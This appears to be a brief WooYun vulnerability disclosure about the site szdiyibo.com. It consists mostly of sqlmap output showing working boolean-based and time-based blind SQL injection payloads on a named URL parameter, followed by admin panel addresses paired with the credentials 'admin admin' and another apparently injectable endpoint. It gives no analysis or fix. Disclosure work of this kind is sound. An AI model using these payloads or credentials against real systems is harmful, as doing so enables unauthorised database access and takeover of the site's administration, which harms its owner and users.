WooYun.org

http://bh.szdiyibo.com/index.php?a=newlist&term=3

sqlmap identified the following injection points with a total of 217 HTTP(s) requests:
---
Place: GET
Parameter: term
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: a=newlist&term=3) AND 7777=7777 AND (7573=7573
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: a=newlist&term=3) AND SLEEP(5) AND (8332=8332
---
back-end DBMS: MySQL 5.0.11

http://www.szdiyibo.com/admin/

lg.szdiyibo.com/admin/ admin admin
bh.szdiyibo.com/admin/  admin admin

http://bh.szdiyibo.com/index.php?g=admin&m=active_log&a=select (POST)
name=1